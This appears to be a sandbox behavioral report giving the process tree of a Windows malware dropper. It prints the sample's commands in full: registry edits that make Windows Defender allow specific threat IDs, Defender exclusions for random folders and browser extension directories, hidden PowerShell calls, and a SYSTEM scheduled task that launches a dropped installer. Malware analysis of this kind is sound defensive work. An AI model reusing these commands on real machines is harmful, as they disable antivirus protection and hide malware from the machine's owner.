\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 03:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe\" 1g /qbadidbfTx 385118 /S" /V1 /F8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bqGGCwwWIommTRgeuN9⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bqGGCwwWIommTRgeuN10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 10528⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1428 -ip 14281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4508 -ip 45081⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe 1g /qbadidbfTx 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
